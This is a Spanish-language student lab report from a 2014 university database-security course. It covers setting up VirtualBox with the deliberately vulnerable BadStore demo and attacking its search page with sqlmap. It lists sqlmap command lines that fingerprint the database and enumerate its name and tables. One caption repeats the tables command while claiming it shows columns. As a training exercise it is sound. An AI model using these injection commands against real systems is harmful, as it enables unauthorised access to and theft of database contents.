practica 1. seguridad en base de datos

Download Practica 1. Seguridad en Base de Datos

Post on 26-Dec-2015

46 views

Category:

Documents

0 download

Embed Size (px)

TRANSCRIPT

Presentacin de PowerPoint

SEGURIDAD EN BASE DE DATOSPRACTICA 1Realizada porDoris E. Jojoa Paz

Escuela de Ciencias Bsicas, Tecnologa e Ingeniera ECBTI, Universidad Nacional Abierta y a Distancia UNAD2014

Instalacin de la mquina virtual Virtual box

Oracle VM VirtualBoxes unsoftwaredevirtualizacinpara arquitecturasx86/amd64, que permite instalarsistemas operativosadicionales, conocidos como sistemas invitados, dentro de otro sistema operativo anfitrin, cada uno con su propio ambiente virtual.

Despus de descargarlo de http://www.oracle.com/. Se procede a su instalacin la cual es muy sencilla. A continuacin se indican las pantallas ms relevantes de su instalacin.

123456Instalacin de virtual vox 4.3.1.6

Una vez instalado virtualbox , tambin se ejecuta un paquete de extensin de virtualbox para complementar su funcionabilidadDESCARGA LA BASE DE DATOS DE BADSTORE Y CONFIGURACIN.Posteriormente, instalado virtualbox, se procede a su configuracin y carga de la base de datos de Badstore que se descarg previamente de www.badstore.net ( se debe dar clic en el apartado que dice descargar demo para acceder a ella). Las siguientes pantallas indican la secuencia realizada para tal efecto.

1234DESCARGA DE BADSTORE.

5678910

Una vez termina la carga y configuracin de Badstore, se procede a iniciar la mquina virtual, mediante el comando ifconfig, se logra visualizar Ip de la base de datos registrada 192.168.0.118 , esta direccin se ubica en el navegador para acceder a Badstore.

ATAQUE POR INYECCIN DE CDIGO SQL UTILIZANDO SQLMAP

SQLMAP se obtiene de http://sqlmap.org/ , pero para su ejecucin requiere de la instalacin de Python. Las carpetas que contienen los archivos de SQLMAP como de Python debe estar en la misma unidad para que funcionen adecuadamente.

ATAQUE A LA BASE DE DATOS DE BADSTORE Para obtener informacin sobre la base de datos de Badstore, ingresamos a CMD, donde se listan sus directorios y a partir de sqlmap.py se ingresan las lneas correspondientes para ver informacin de la base de datos, como versin, tablas entre otras.

Las siguientes pantallas muestran informacin de la base datos.

Mediante la siguiente lnea : sqlmap.py -u "http://192.168.0.118/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" b

se observa: Conexin a la base de datos y la versin

Mediante la lnea: sqlmap.py -u "http://192.168.0.118/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-dbSe observa el nombre de la base de datos

Mediante la lnea: sqlmap.py -u "http://192.168.0.118/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredbSe observan las tablas de la base de datos

Mediante la lnea: sqlmap.py -u "http://192.168.0.118/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredbSe observan las columnas de la base de datos. Y asi con diferentes parametros se pueden extraer datos del contenido de las tablas entre otros.

ReferenciasTutorial - Manual SQLmap: ataques SQLi - Inyeccin SQL. Recuperado el 27 de septiembre de 2014 de: http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html

http://www.oracle.com/technetwork/es/server-storage/virtualbox/downloads/index.html#vbox

http://sqlmap.org/

Descargar y usar SQLmap en Windows (Anonymous Cooperacin Ciberactivista Global).(2/09/2012). Recuperado el 27 de septiembre de 2014 de: http://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M